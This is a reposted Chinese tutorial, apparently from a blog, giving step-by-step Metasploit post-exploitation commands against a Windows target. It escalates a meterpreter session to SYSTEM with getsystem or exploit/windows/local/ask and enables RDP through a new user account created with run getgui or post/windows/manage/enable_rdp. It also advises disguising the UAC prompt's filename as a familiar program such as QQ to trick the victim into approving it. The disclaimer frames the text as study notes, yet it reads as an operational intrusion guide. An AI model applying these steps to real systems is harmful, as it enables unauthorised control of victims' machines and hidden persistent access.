本文只是交流学习心得,如果被拿去做违法乱纪的事情,请自行负责,与作者无关
第一步:先确定自己的权限是不是系统权限
如果你得到meterpreter之后,不是系统权限,那么就不能创建新的用户,到后面你就会得到一个权限不足的提示。
如下图
那就先查看自己的权限,getuid
我这个可能不是系统的权限,就需要进行提权,输入 getsystem
很不幸,如果执行之后报错
那就需要再换一个方法,输入bg,进入后台管理模式,并且记住这个session 1
然后这里还需要用到 exploit/windows/local/ask
看看它的选项 options
这里的ip是监听机的ip, 我原来的session是1,而且端口是7777
只需要设置 set session 1和 set lport 7777即可
然后run,然后靶机会有个弹窗需要你确认,点击是即可(可能你觉得这个弹窗很低级,一般人谁会去点这个,但是刚才的设置里面是有一个filename选项的,它可以替换成任意的内容,比如QQ,这样的话,你点击的概率会大大提高)
之后返回的meterpreter就是系统权限了
第二步:创建一个新的用户
如果你输入命令 run getgui -u 用户名 -p 密码,不能创建的话,如下图
就用 run post/windows/manage/enable_rdp USERNAME=用户名 PASSWORD=密码,这个指令更加稳定,下图是执行成功了
去靶机上面查看,Win+R输入netplwiz,发现成功创建!
原文地址:http://www.cnblogs.com/reweber/p/16929971.html
1. 本站所有资源来源于用户上传和网络,如有侵权请邮件联系站长!
2. 分享目的仅供大家学习和交流,请务用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布,分享有积分奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务请大家谅解!
5. 如有链接无法下载、失效或广告,请联系管理员处理!
6. 本站资源售价只是赞助,收取费用仅维持本站的日常运营所需!
7. 如遇到加密压缩包,默认解压密码为"gltf",如遇到无法解压的请联系管理员!
8. 因为资源和程序源码均为可复制品,所以不支持任何理由的退款兑现,请斟酌后支付下载
声明:如果标题没有注明"已测试"或者"测试可用"等字样的资源源码均未经过站长测试.特别注意没有标注的源码不保证任何可用性